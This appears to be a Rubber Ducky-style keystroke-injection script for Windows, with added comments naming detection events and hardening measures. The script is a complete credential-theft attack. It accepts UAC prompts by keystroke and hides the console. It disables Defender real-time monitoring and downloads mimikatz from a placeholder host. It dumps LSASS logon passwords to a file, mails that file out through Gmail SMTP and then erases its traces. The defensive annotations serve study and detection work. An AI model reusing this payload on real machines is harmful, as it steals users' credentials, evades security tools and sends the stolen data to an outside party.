upload_inject_older_10
REM Author: WizhardHacker1
REM Date: 2/1/2020
REM Keystroke-injection (HID) payload: every line below is typed into the
REM logged-in user's session. The added REM notes describe what each stage
REM does and which artifacts and controls are relevant to detection and hardening.
REM -------------open command prompt with admin privileges
REM Run dialog -> powershell -> cmd launched with -Verb runAs (an elevation request).
DELAY 1000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
REM LEFT + ENTER presumably answer the UAC consent dialog. Hardening: a
REM standard-user session, or UAC configured to prompt for credentials, leaves
REM nothing to accept with two keystrokes.
LEFT
ENTER
DELAY 2000
STRING powershell
ENTER
REM Console is shrunk to 1x1 so the typed commands are hard to see on screen.
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
DELAY 1000
REM Turns off Microsoft Defender real-time monitoring. Detection: Defender
REM operational log event 5001 (real-time protection disabled) and any
REM Set-MpPreference -DisableRealtimeMonitoring command line. Mitigation:
REM Defender Tamper Protection blocks this setting change.
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 100
REM Stops PSReadLine from saving command history for this session. PowerShell
REM script block logging (event 4104), where enabled, is independent of
REM PSReadLine history and still records what follows.
STRING Set-PSReadlineOption -HistorySaveStyle SaveNothing
ENTER
DELAY 5000
REM -------------download appropriate mimikatz for architecture
REM Chooses a 32- or 64-bit build from the pointer size and fetches it with
REM System.Net.WebClient over plain HTTP into C:\Windows\Temp\pw.exe
REM ('url.com' is a placeholder host in this listing).
REM Detection: powershell.exe making an outbound HTTP request and writing an
REM .exe under C:\Windows\Temp; process-creation logging for pw.exe.
REM Mitigation: application control (AppLocker / WDAC) denying execution from
REM temp directories; web proxy filtering of executable downloads.
STRING if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url.com/32bit_mimikatz/mimikatz.exe','c:\windows\temp\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url.com/64bit_mimikatz/mimikatz.exe','C:\Windows\Temp\pw.exe');}
ENTER
DELAY 5000
REM Requests another elevated cmd.exe from inside the PowerShell session.
STRING start-process cmd.exe -Verb runAs
ENTER
DELAY 3000
REM -------------get the passwords and save to c:\pwlog.txt
REM Starts the downloaded binary with stdout redirected to c:\pwlog.txt, then
REM types mimikatz commands that request SeDebugPrivilege and read logon
REM credentials out of LSASS memory.
REM Detection: a non-system process opening lsass.exe (e.g. Sysmon event 10
REM with lsass.exe as target), and a credential dump file at the root of C:.
REM Mitigation: Credential Guard, LSA protection (RunAsPPL), and the Defender
REM ASR rule that blocks credential stealing from lsass.exe.
STRING C:\Windows\Temp\pw.exe > c:\pwlog.txt & type pwlog.txt;
ENTER
DELAY 2000
STRING privilege::debug
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
ENTER
DELAY 1000
STRING exit
ENTER
STRING exit
ENTER
DELAY 300
REM Deletes the tool from disk; process-creation and file-creation telemetry
REM recorded before this point is not affected by the delete.
STRING del C:\Windows\Temp\pw.exe
ENTER
DELAY 300
REM -------------email log via gmail
REM Opens a fresh elevated, minimised PowerShell and sends c:\pwlog.txt as an
REM attachment through smtp.gmail.com on port 587 with TLS, using account
REM credentials hard-coded in the payload (placeholders in this listing).
REM Detection: a workstation process (powershell.exe) making a direct SMTP
REM submission connection to an external mail provider.
REM Mitigation: egress filtering so only sanctioned mail relays can reach
REM external SMTP ports from user subnets.
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
REM LEFT + ENTER presumably answer the UAC consent dialog again.
LEFT
ENTER
DELAY 2000
STRING powershell
ENTER
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
DELAY 300
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
REM The sender account and password are embedded in clear text; a recovered
REM device or captured keystroke log exposes them to incident responders.
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('[email protected]', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = '[email protected]'
ENTER
STRING $ReportEmail.To.Add('[email protected]')
ENTER
REM Fixed subject and body strings; usable as mail-gateway or DLP match terms.
STRING $ReportEmail.Subject = 'MimiKatZ Report'
ENTER
STRING $ReportEmail.Body = 'Attached is your MiMiKatZ report.'
ENTER
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 4000
STRING exit
ENTER
REM ---------------------delete and end
REM Cleanup stage: deletes the credential log, closes the open shells, then
REM opens one more elevated PowerShell to switch Defender real-time
REM monitoring back on and clear the session's command history.
STRING del c:\pwlog.txt
ENTER
DELAY 300
STRING exit
ENTER
STRING exit
ENTER
STRING exit
ENTER
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
REM LEFT + ENTER presumably answer the UAC consent dialog.
LEFT
ENTER
DELAY 2000
STRING powershell
ENTER
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
DELAY 1000
REM Re-enables real-time monitoring. Detection: a Defender "disabled" event
REM (5001) followed shortly by an "enabled" event (5000) on the same host,
REM with no matching administrative change, is a useful correlation rule.
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
REM Clear-History removes only the current session's in-memory history.
REM Nothing in this script touches the Windows event logs, so Defender,
REM PowerShell and process-creation records remain available for triage.
STRING Clear-History
ENTER
STRING exit
ENTER